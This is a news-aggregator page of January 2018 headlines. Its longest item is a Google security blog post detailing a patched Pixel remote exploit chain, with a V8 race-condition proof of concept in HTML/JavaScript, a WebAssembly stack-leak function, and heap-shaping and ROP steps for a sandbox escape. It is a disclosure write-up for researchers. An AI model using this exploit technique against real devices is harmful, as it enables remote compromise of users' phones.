Kokthansogreta.nu - Nyhetssök / News Search ! » January 17, 2018 (1851465 unread)

« Expand/Collapse

(75 unread)

Skip to page: 1 2 3 ... 26

January 17, 2018
23:59
Malmökonstnären Sture Johannesson är död
» ‎ Expressen: Nyheter

Tags: [edit]

Sture Johannesson är död.

En av få svenska konstnärer sprungna ur 60-talets hippie-kultur har hyllats som Sture på den internationella konstscenen.

Med böcker, analyser och utställningar i flera av världens konstmetropoler.

23:59
Malmökonstnären Sture Johannesson är död
» ‎ KvP: Nyheter

Tags: [edit]

Sture Johannesson är död.

En av få svenska konstnärer sprungna ur 60-talets hippie-kultur har hyllats som Sture på den internationella konstscenen.

Med böcker, analyser och utställningar i flera av världens konstmetropoler.

23:58
Nintendo Labo: Price, Details, Release Date
» ‎ WIRED

Tags: [edit]

Labo is a set of cardboard, build-it-yourself accessories for Nintendo's super-popular Switch gaming console.

23:55
Porn star: Trump compared me to Ivanka after generic sex
» ‎ Home | Mail Online

Tags: [edit]

Porn star Stormy Daniels passed a polygraph test in 2011 as she talked about her 'textbook generic' sexual relations with a married Donald Trump more than a decade ago, In Touch Weekly claims .

23:55
Ännu en utredning mot Kevin Spacey
» ‎

Tags: [edit]

23:54
The Angle: More Like a Loose Group Edition
» ‎ Stories from Slate

Tags: [edit]

No pitchforks here: Osita Nwanevu looks at the movement’s very measured response to the recent Aziz Ansari callout and concludes that commentators accusing #MeToo of going off the rails are battling straw women.

What it started: A year after the Women’s March, feminist activists are getting things done. Christina Cauterucci paints a portrait of tenacious momentum.

Check your assumptions: Facebook thinks we want to see less news and more of our friends and family. But what if our friends and family are bores—or boorish? April Glaser wonders if the company spared a thought for the annoyed.

A town’s hunger: As part of our new Future Tense Fiction series, Nebula Award winner Charlie Jane Anders wrote us a short story about a famine in a smart city that’s lost control of its supply lines.

For fun: Things Paul Thomas Anderson likes.

Chester Himes? Nice,

Rebecca

23:53
"Scenkonstens tystnadskultur måste brytas"
» ‎ Senaste nyheterna för Alla nyheter på op.se

Tags: [edit]

En nytillsatt kommission mot sexuella trakasserier ska arbeta mot långsiktig förändring inom scenkonstområdet. – Det finns ingen mening med att formulera någonting som bara låter fint, säger kommissionens ordförande Anna Wahl.

23:51
Cannabis users are more likely to feel deceived by others
» ‎ Home | Mail Online

Tags: [edit]

Researchers from the National Institute on Alcoholism and Alcohol Abuse in Maryland found marijuana increases signal connectivity in regions of the brain that have been linked to psychosis.
23:51
Torturous regime behind Meghan’s glossy mane
» ‎ Home | Mail Online

Tags: [edit]

Meghan Markle revealed in 2011 that she uses Brazilian blowouts to keep her hair straight. Women with black and mixed-race hair shared their experiences of changing their hair texture.
23:51
WhatsApp scam tricks users into paying 'subscription fee'
» ‎ Home | Mail Online

Tags: [edit]

Fresh warnings have been issued over a WhatsApp scam that tricks users into paying a 'subscription'. The scam, which first surfaced last year, charges users 99p to renew their subscription.
23:51
President's phone obsession is revealed
» ‎ Home | Mail Online

Tags: [edit]

President Trump spends a chunk of each day on the phone, whether it's a White House landline or 'Trump One' or 'Trump Two,' the nicknames his aides have given to his two cell phones.
23:48
Police are 'very concerned' for missing 10-year-old girl
» ‎ Home | Mail Online

Tags: [edit]

Detectives have launched a bid to find ten-year-old Chloe Rosenberg (pictured) who was described as being 'upset' when she left her house in Poole, Dorset at 5.55pm tonight.

23:47
Brigitte Bardot sågar MeToo: Tramsigt
» ‎

Tags: [edit]

23:45
Girl confuses gauze for tampon after wisdom teeth surgery
» ‎ Home | Mail Online

Tags: [edit]

A funny video shows the moment a girl thinks she has a tampon in her mouth. It is actually gauze a doctor placed in after she had wisdom teeth surgery. The family lives in Jones County, Mississippi.
23:43
Dolores O'Riordan's boyfriend pays tribute to star
» ‎ Home | Mail Online

Tags: [edit]

In a statement on D.A.R.K's official website, Ole Koretsky said: 'My friend, partner, and the love of my life is gone. My heart is broken and it is beyond repair. Pictured: The couple together.
23:43
Dorking man convicted of stealing mailbags clears his name
» ‎ Home | Mail Online

Tags: [edit]

Stephen Simmons (pictured with his wife and daughter outside court) always protested his innocence and finally had his conviction overturned at the Court of Appeal in London.

23:41
Market report: Imperial dips as deal talk stubbed out
» ‎ The Telegraph - Telegraph online, Daily Telegraph, Sunday Telegraph

Tags: [edit]

23:41
Alcatel 3C officially introduced with 6-inch HD+ display, Android Nougat
» ‎ PhoneArena - News

Tags: [edit]

TCL confirmed earlier this month it will unveil new smartphones at Mobile World Congress (MWC) in late February. The Chinese company hinted to three new smartphone lineups: Alcatel 5, Alcatel 3 and Alcatel 1.

Three smartphones have been mentioned by TCL in the announcement, each belonging to one of the Alcatel series to be introduced next month: Alcatel 5, Alcatel 3V and Alcatel 1X.

Today, TCL launched yet another Android smartphone, the cheap Alcatel 3C, its first handset to feature an 18:9 display. The Alcatel 3C was introduced in Italy and is likely to go on sale in other European ...

23:40
Kate Middleton visits a tennis school for youngsters
» ‎ Home | Mail Online

Tags: [edit]

The Duchess of Cambridge visited Great Ormond Street Children's Hospital on Wednesday before moving on to Bond Primary School in Mitcham - but not before a quick outfit change.
23:40
Rupert Murdoch hospitalized with back injury
» ‎ Home | Mail Online

Tags: [edit]

The 86-year-old revealed the accident in an email to his senior management team last week in which he explained why he would be working from home.

23:39
Nintendo Labo lets you use your Switch to bring cardboard toys to life
» ‎ BGR

Tags: [edit]

Nintendo on Wednesday introduced a new line of interactive DIY cardboard creations that come to life with the power of the Switch. Dubbed Nintendo Labo, the initiative features packaged kits filled with modular sheets of cardboard that Switch owners can build into objects such as pianos, fishing rods and motorcycles. Once the construction is finished, the Switch and the Joy-Con controllers can interact with the creations (which are called Toy-Cons). Each kit interacts with the console in a unique way. For example, the console slides into the top of the 13-key piano while the right Joy-Con slots into a pocket on the side. From there, the IR Motion Camera in the controller can detect which keys you press and will immediately translate them into notes which you'll hear from the Switch. Players will have the ability to build a set of functioning handlebars to simulate a motorbike. You can also put together a fishing rod, which has its own rotating reel and a string. There's even a customizable robot suit that you can build and wear while you terrorize a city, knocking down buildings and taking out UFOs. [https:] Nintendo Labo opens the door to countless potential kits, but the line officially launches on April 20th with two Toy-Con kits. The first is the Variety Kit, which features two Toy-Con RC Cars, the Toy-Con Fishing Rod, Toy-Con House, Toy-Con Motorbike and Toy-Con Piano. It will retail for $69.99. There's also a separate Robot Kit, which comes with a visor, backpack and straps for your hands. It will sell for $79.99. Both kits have everything you need to get started, including the relevant software that will allow you to play along on your Switch.

23:37
Google will consider load times in mobile search rankings
» ‎ Engadget RSS Feed

Tags: [edit]

Google is always optimizing search, but has given mobile more prominence lately, including axing its long-running Instant Search feature last July to unify searching on desktop and device. Their latest tweak, which goes into effect July 2018, aims to...

23:34
Pair's honeymoon aboard Carnival Triumph ruined by sewage
» ‎ Home | Mail Online

Tags: [edit]

Christine Parker and John Shoemaker, of Missouri, say their five-day honeymoon on board Carnival Triumph in November of 2017 was marred by unsanitary conditions.

23:34
YouTube is taking down Tide Pod Challenge videos and oh my god don’t eat laundry pods
» ‎ The Verge - Tech Posts

Tags: [edit]

I’m not the first person to write this on the internet, and I won’t be the last, but good lord, DO NOT EAT TIDE PODS. Unfortunately, what started as a fairly ridiculous meme about how delicious-looking the detergent-filled gel pods are has spiraled into a dangerous meme, with people actually filming themselves eating the blighted poison packs for a shot at 15 minutes of internet fame in the “Tide Pod challenge.”

That buck stops here though, with YouTube commenting that it would remove any Tide Pod challenge videos, noting in a statement to Fast Company that “YouTube’s Community Guidelines prohibit content that’s intended to encourage dangerous activities that have an inherent risk of physical harm. We work to quickly remove flagged...

Continue reading…

23:34
YouTube is taking down Tide Pod Challenge videos and oh my god don’t eat laundry pods
» ‎ The Verge - All Posts

Tags: [edit]

I’m not the first person to write this on the internet, and I won’t be the last, but good lord, DO NOT EAT TIDE PODS. Unfortunately, what started as a fairly ridiculous meme about how delicious-looking the detergent-filled gel pods are has spiraled into a dangerous meme, with people actually filming themselves eating the blighted poison packs for a shot at 15 minutes of internet fame in the “Tide Pod challenge.”

That buck stops here though, with YouTube commenting that it would remove any Tide Pod challenge videos, noting in a statement to Fast Company that “YouTube’s Community Guidelines prohibit content that’s intended to encourage dangerous activities that have an inherent risk of physical harm. We work to quickly remove flagged videos that violate our policies.”
Do not eat laundry pods, please
According to Time, there have already been 39 reported cases of teenagers misusing the colorful laundry pods so far in 2018 by the American Association of Poison Control Centers. That may not sound like a lot at first glance, but is already a number on par with total incidents over the course of an entire year (39 cases in 2016, and 53 in 2017).

In an earlier statement to Time, Procter & Gamble (which owns Tide) noted that the company was “been working with leading social media networks to remove harmful content that is not consistent with their policies,” and that “laundry pacs are made to clean clothes. They should not be played with, whatever the circumstance, even if meant as a joke.”

So, yeah. Don’t eat laundry pods. That fact that YouTube considers it a violation of community policies and could take down your video, issue strikes against your channel, and possibly remove your entire account shouldn’t factor into this decision, but it’s 2018 and here we are.

23:33
Amazon Music Unlimited is getting even more unlimited
» ‎ Mashable

Tags: [edit]

Every product here is independently selected by Mashable journalists. If you buy something featured, we may earn an affiliate commission which helps support our work.

Following the much anticipated, closely analyzed launch of Amazon in Australia, the company is finally gearing up to introduce Amazon Music to the country.

Set to launch in Australia and New Zealand on Feb. 1, Amazon Music Unlimited will become available with a catalogue of more than 45 million songs.

SEE ALSO: Alexa can wake you up with your favorite song

Feb. 1 also marks the shipping date for Australia and New Zealand's first Alexa-powered Echo, Echo Dot, or Echo Plus devices. Preorders begin today. Amazon announced the coming of its hands-free device, activated by smart voice assistant Alexa, to both countries in November. Read more...
More about Tech, Australia, Amazon, Streaming Music, and New Zealand

23:33
Försvarsexpert avfärdar Löfven
» ‎ Nyheter (Ekot)

Tags: [edit]

Statministern utesluter inte militära insatser för att bekämpa den organiserade brottsligheten i utsatta områden.

Lyssna: Jessica Appelgren: Beväpnad militär är fullkomligt uteslutet

Stefan Löfven sa på onsdagen att han inte utesluter att använda militär mot den organiserade brottsligheten. Men Försvarshögskolans expert säger att sådana insatser sannolikt saknar lagligt stöd.

Efter onsdagens riksdagsdebatt sa Stefan Löfven att han inte utesluter att använda militär mot den organiserade brottsligheten.

Frågan hade förts på tal under riksdagsdebatten av Sverigedemokraternas partiledare Jimmy Åkesson.

– Det är inte min förstahandsåtgärd men vi måste göra vad som krävs för att den organiserade brottsligheten ska bort ifrån Sverige, den kväver vårat samhällsbygge, sa statsminister Stefan Löfven.

Jessica Appelgren som är universitetsadjunkt vid Centrum för operativ juridik och folkrätt på Försvarshögskolan säger att Löfvens uttalande inte rimmar med svensk lag.

– Jag tror att det vi tänker på när han säger så är vålds- och tvångsanvändning. Och det finns det överhuvudtaget inget lagstöd för i dag. Försvarsmakten kan stötta på polisen på många sätt, men då får det inte finnas någon som helst risk att försvarsmaktens personal hamnar i en situation där de behöver använda våld eller tvång, säger Jessica Appelgren.

Det enda lagliga möjligheten Jessica Appelgren kan se, där polisen får ta hjälp av Försvarsmakten för vålds- eller tvångsåtgärder, är om det handlar om terrorism.

– Det är genom en relativt ny lag från 2006 och handlar om stöd till polisen vid terrorismbekämpning.

Finns det någon möjlighet att se organiserad brottslighet som terrorism?

– Jag kan inte riktigt se det. Om man tittar på lagen om terroristbrott så handlar det om att injaga allvarlig fruktan hos befolkningen eller tvinga något offentligt organ att vidta eller avstå från någon viss åtgärd, säger Jessica Appelgren.

Militär som bär vapen, ser du det som helt uteslutet i det här sammanhanget?

– Fullkomligt uteslutet.

Staffan Axelsson
staffan.axelsson@sverigesradio.se

Permalink for 'Android Security Ecosystem Investments Pay Dividends for Pixel'

23:32

Android Security Ecosystem Investments Pay Dividends for Pixel

» ‎ Google Online Security Blog

Posted by Mayank Jain and Scott Roberts, Android security team

[Cross-posted from the Android Developers Blog]

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.
All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.
The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.
The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.
Technical details of a Pixel remote exploit chainThe Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.
This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).
The RCE bug (CVE-2017-5116)New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.
The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })
var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);
//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.
Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)
/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop
Safepoints (size = 8)
RelocInfo (size = 0)
--- End code ---

When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function.

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      
/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.
Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.
The EoP Bug (CVE-2017-14904)The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}
int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.

52neverallow isolated_app {
53    service_manager_type
54    -activity_service
55    -display_service
56    -webviewupdate_service
57}:service_manager find;

To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.
This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app.
To exploit this EoP bug:
1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap and the heap data will be written to the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;
    /* the sizeof() of the actual EGL native type */
    int version;
    void* reserved[4];
    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6.Trigger a GC to execute ROP
When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf .
SummaryThe Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities.
